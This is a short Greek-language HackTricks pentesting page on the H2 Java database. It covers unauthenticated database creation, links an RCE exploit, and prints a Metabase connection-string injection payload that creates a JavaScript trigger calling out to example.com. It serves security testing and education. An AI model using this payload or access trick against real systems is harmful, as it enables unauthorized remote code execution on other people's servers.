37 lines
2.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# H2 - Java SQL database
{{#include ../../banners/hacktricks-training.md}}
Επίσημη σελίδα: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
## Πρόσβαση
Μπορείτε να δηλώσετε ένα **ανύπαρκτο όνομα βάσης δεδομένων** προκειμένου να **δημιουργήσετε μια νέα βάση δεδομένων χωρίς έγκυρα διαπιστευτήρια** (**μη αυθεντικοποιημένος**):
![](<../../images/image (131).png>)
Ή αν γνωρίζετε ότι για παράδειγμα **τρέχει μια mysql** και γνωρίζετε το **όνομα της βάσης δεδομένων** και τα **διαπιστευτήρια** για αυτή τη βάση δεδομένων, μπορείτε απλά να έχετε πρόσβαση σε αυτήν:
![](<../../images/image (201).png>)
_**Τέχνασμα από το box Hawk του HTB.**_
## **RCE**
Έχοντας πρόσβαση για να επικοινωνήσετε με τη βάση δεδομένων H2, ελέγξτε αυτό το exploit για να αποκτήσετε RCE σε αυτήν: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
## H2 SQL Injection σε RCE
Σε [**αυτή την ανάρτηση**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) εξηγείται ένα payload για να αποκτήσετε **RCE μέσω μιας βάσης δεδομένων H2** εκμεταλλευόμενοι μια **SQL Injection**.
```json
[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
```
{{#include ../../banners/hacktricks-training.md}}